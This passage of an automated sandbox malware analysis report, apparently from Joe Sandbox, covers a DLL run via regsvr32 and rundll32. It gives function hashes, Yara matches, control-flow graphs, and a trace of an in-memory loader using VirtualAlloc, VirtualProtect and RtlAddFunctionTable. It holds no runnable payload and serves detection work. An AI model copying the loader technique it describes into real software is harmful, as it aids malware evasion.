                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_getptd
                                                                    • String ID: #
                                                                    • API String ID: 3432092939-1885708031
                                                                    • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                    • Instruction ID: b61db7e427d1f74fa0e23deecf3338e05fdc086b75afb70a3daa0fc0bea9a8d4
                                                                    • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                    • Instruction Fuzzy Hash: AF51B222A0CB8585E7308F18F4656BE7BA0F782BC0F584171DAAD97785CE3DD849CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B9BB0 Relevance: 5.1, APIs: 4, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                    • Instruction ID: 3589e40553d75f7a47c4da01a8e872e433a2a474ad1153a335f7f8a34fe03342
                                                                    • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                    • Instruction Fuzzy Hash: 1D51A232A1878186EB709F56B46A2B977A0BB85BC4F544575EBAD87781CF3CE44AC300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 3264 17092630000 3265 17092630183 3264->3265 3266 1709263043e VirtualAlloc 3265->3266 3269 17092630462 3266->3269 3267 17092630531 GetNativeSystemInfo 3268 1709263056d VirtualAlloc 3267->3268 3272 17092630a7b 3267->3272 3270 1709263058b 3268->3270 3269->3267 3269->3272 3271 17092630a00 3270->3271 3274 170926309d9 VirtualProtect 3270->3274 3271->3272 3273 17092630a56 RtlAddFunctionTable 3271->3273 3273->3272 3274->3270

                                                                    Executed Functions

                                                                    Function 0000017092630000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 17092630000-17092630460 call 17092630aa8 * 2 VirtualAlloc 22 17092630462-17092630466 0->22 23 1709263048a-17092630494 0->23 24 17092630468-17092630488 22->24 26 17092630a91-17092630aa6 23->26 27 1709263049a-1709263049e 23->27 24->23 24->24 27->26 28 170926304a4-170926304a8 27->28 28->26 29 170926304ae-170926304b2 28->29 29->26 30 170926304b8-170926304bf 29->30 30->26 31 170926304c5-170926304d2 30->31 31->26 32 170926304d8-170926304e1 31->32 32->26 33 170926304e7-170926304f4 32->33 33->26 34 170926304fa-17092630507 33->34 35 17092630531-17092630567 GetNativeSystemInfo 34->35 36 17092630509-17092630511 34->36 35->26 38 1709263056d-17092630589 VirtualAlloc 35->38 37 17092630513-17092630518 36->37 39 17092630521 37->39 40 1709263051a-1709263051f 37->40 41 170926305a0-170926305ac 38->41 42 1709263058b-1709263059e 38->42 43 17092630523-1709263052f 39->43 40->43 44 170926305af-170926305b2 41->44 42->41 43->35 43->37 46 170926305c1-170926305db 44->46 47 170926305b4-170926305bf 44->47 48 1709263061b-17092630622 46->48 49 170926305dd-170926305e2 46->49 47->44 51 170926306db-170926306e2 48->51 52 17092630628-1709263062f 48->52 50 170926305e4-170926305ea 49->50 53 1709263060b-17092630619 50->53 54 170926305ec-17092630609 50->54 56 17092630864-1709263086b 51->56 57 170926306e8-170926306f9 51->57 52->51 55 17092630635-17092630642 52->55 53->48 53->50 54->53 54->54 55->51 60 17092630648-1709263064f 55->60 58 17092630871-1709263087f 56->58 59 17092630917-17092630929 56->59 61 17092630702-17092630705 57->61 64 1709263090e-17092630911 58->64 62 17092630a07-17092630a1a 59->62 63 1709263092f-17092630937 59->63 65 17092630654-17092630658 60->65 66 17092630707-1709263070a 61->66 67 170926306fb-170926306ff 61->67 90 17092630a40-17092630a4a 62->90 91 17092630a1c-17092630a27 62->91 69 1709263093b-1709263093f 63->69 64->59 68 17092630884-170926308a9 64->68 70 170926306c0-170926306ca 65->70 71 17092630788-1709263078e 66->71 72 1709263070c-1709263071d 66->72 67->61 96 17092630907-1709263090c 68->96 97 170926308ab-170926308b1 68->97 76 17092630945-1709263095a 69->76 77 170926309ec-170926309fa 69->77 74 1709263065a-17092630669 70->74 75 170926306cc-170926306d2 70->75 73 17092630794-170926307a2 71->73 72->73 78 1709263071f-17092630720 72->78 80 170926307a8 73->80 81 1709263085d-1709263085e 73->81 86 1709263066b-17092630678 74->86 87 1709263067a-1709263067e 74->87 75->65 82 170926306d4-170926306d5 75->82 84 1709263097b-1709263097d 76->84 85 1709263095c-1709263095e 76->85 77->69 88 17092630a00-17092630a01 77->88 89 17092630722-17092630784 78->89 93 170926307ae-170926307d4 80->93 81->56 82->51 101 170926309a2-170926309a4 84->101 102 1709263097f-17092630981 84->102 98 17092630960-1709263096c 85->98 99 1709263096e-17092630979 85->99 100 170926306bd-170926306be 86->100 103 17092630680-1709263068a 87->103 104 1709263068c-17092630690 87->104 88->62 89->89 105 17092630786 89->105 94 17092630a7b-17092630a8e 90->94 95 17092630a4c-17092630a54 90->95 92 17092630a38-17092630a3e 91->92 92->90 110 17092630a29-17092630a35 92->110 131 170926307d6-170926307d9 93->131 132 17092630835-17092630839 93->132 94->26 95->94 111 17092630a56-17092630a79 RtlAddFunctionTable 95->111 96->64 108 170926308b3-170926308b9 97->108 109 170926308bb-170926308c8 97->109 112 170926309be-170926309bf 98->112 99->112 100->70 106 170926309a6-170926309aa 101->106 107 170926309ac-170926309bb 101->107 113 17092630983-17092630987 102->113 114 17092630989-1709263098b 102->114 115 170926306b6-170926306ba 103->115 116 17092630692-170926306a3 104->116 117 170926306a5-170926306a9 104->117 105->73 106->112 107->112 121 170926308ea-170926308fe 108->121 122 170926308d3-170926308e5 109->122 123 170926308ca-170926308d1 109->123 110->92 111->94 120 170926309c5-170926309cb 112->120 113->112 114->101 118 1709263098d-1709263098f 114->118 115->100 116->115 117->100 119 170926306ab-170926306b3 117->119 126 17092630991-17092630997 118->126 127 17092630999-170926309a0 118->127 119->115 128 170926309d9-170926309e9 VirtualProtect 120->128 129 170926309cd-170926309d3 120->129 121->96 139 17092630900-17092630905 121->139 122->121 123->122 123->123 126->112 127->120 128->77 129->128 136 170926307e3-170926307f0 131->136 137 170926307db-170926307e1 131->137 133 17092630844-17092630850 132->133 134 1709263083b 132->134 133->93 138 17092630856-17092630857 133->138 134->133 141 170926307f2-170926307f9 136->141 142 170926307fb-1709263080d 136->142 140 17092630812-1709263082c 137->140 138->81 139->97 140->132 144 1709263082e-17092630833 140->144 141->141 141->142 142->140 144->131
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.356213727.0000017092630000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017092630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_17092630000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: 66badca975bebd088dcd6db3c4152a0989d08f54ae6781e3743bb8504e9a580b
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: E372AD30619B488BDB69DF18C8857E9B7F0FB98304F10562DE98EC3652DB34D946CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

